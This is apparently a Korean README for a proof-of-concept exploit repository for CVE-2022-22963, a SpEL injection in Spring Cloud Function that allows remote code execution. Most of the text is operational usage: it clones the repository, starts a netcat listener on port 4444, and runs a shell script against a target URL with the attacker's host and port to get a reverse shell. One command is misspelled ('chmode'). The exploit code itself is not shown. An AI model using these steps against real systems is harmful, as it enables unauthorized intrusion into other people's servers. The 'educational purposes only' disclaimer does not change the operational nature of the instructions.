
CVE-2022-22963에 대한 개념 증명 익스플로잇, 원격 코드 실행으로 이어지는 Spring Cloud Function SpEL 인젝션입니다. 리버스 셸 페이로드를 이용한 자동화된 익스플로잇을 위한 쉘 스크립트를 포함합니다.
Spring Cloud Function 버전 3.1.6, 3.2.2 및 이전 버전에서 라우팅 기능을 사용할 때 사용자가 특수하게 조작된 SpEL을 라우팅 표현식으로 제공할 수 있으며, 이로 인해 원격 코드 실행 및 로컬 리소스 접근이 발생할 수 있습니다.
저장소를 클론합니다
git clone https://github.com/jrbH4CK/CVE-2022-22963.git
폴더로 이동합니다
cd CVE-2022-22963
실행 권한을 변경합니다
chmode +x springCloud.sh
원하는 포트로 nc를 시작합니다
nc -nlvp 4444
필요에 따라 매개변수를 변경하여 다음 명령을 실행합니다
./springCloud.sh url lhost lport
참고: 이 저장소의 사용은 사용자 본인의 책임이며 작성자의 책임이 아닙니다. 교육 목적으로만 사용하세요.